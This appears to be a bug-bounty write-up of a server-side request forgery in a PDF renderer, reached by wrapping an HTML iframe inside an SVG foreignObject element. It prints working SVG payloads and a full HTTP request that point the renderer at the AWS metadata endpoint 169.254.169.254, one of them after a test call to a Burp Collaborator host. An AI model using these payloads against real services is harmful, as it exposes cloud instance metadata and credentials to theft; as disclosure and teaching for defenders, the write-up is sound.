SSRF in PDF Renderer using SVG

SSRF in PDF Renderer using SVG

Tomi
May 19, 2021
2 min read
44 views

Some Information on this Post, such asthe Target URL, Endpoint, and several others, was modified to protect the Privacy of the Program

A few times ago, I had the opportunity to do Bug Hunting activities in one of the Private Programs a Bugcrowd. In this program, there is a complex application with various features. One of the highlights is converting objects to PDF, JPG, PNG files from SVG.

I. Initial Test - Sending HTML Tag

When I found a feature to create PDFs from data inputted by the user, I immediately experimented to carry out SSRF attacks by changing the SVG code that was sent to HTML containing the iframe tag, which was directed to the Burp Collaborator.

POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close

------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"


<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

But unfortunately, the server responded with an error message.

{"message": "Error when converting data."}

It looks like the server can only process input that is a valid SVG file.

II. Embedding HTML using foreignObject

After doing some googling, I found that we can embed the HTML code into the SVG code using an element named foreignObject.

The <foreignObject> SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.

Source: https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject

So I changed the payload to be like this:

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500"> <g> <foreignObject width="800" height="500"> <body xmlns="http://www.w3.org/1999/xhtml"> <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe> </body> </foreignObject> </g> 9</svg>

After getting a hit on the Burp Collaborator Client, I checked the IP address used, and it turned out that the application uses Amazon Web Service and from the User Agent I notice that the SVG is rendered using PhantomJS.

So I modified the payload to exfiltrate the Metadata on the AWS Instance.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500"> <g> <foreignObject width="800" height="500"> <body xmlns="http://www.w3.org/1999/xhtml"> <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe> </body> </foreignObject> </g> 9</svg>

And metadata was successfully obtained.

SSRF in PDF Renderer using SVG
Figure 1 - Retrieving AWS Metadata via PDF File

I immediately reported this finding, marked as P1 and was rewarded $2,150.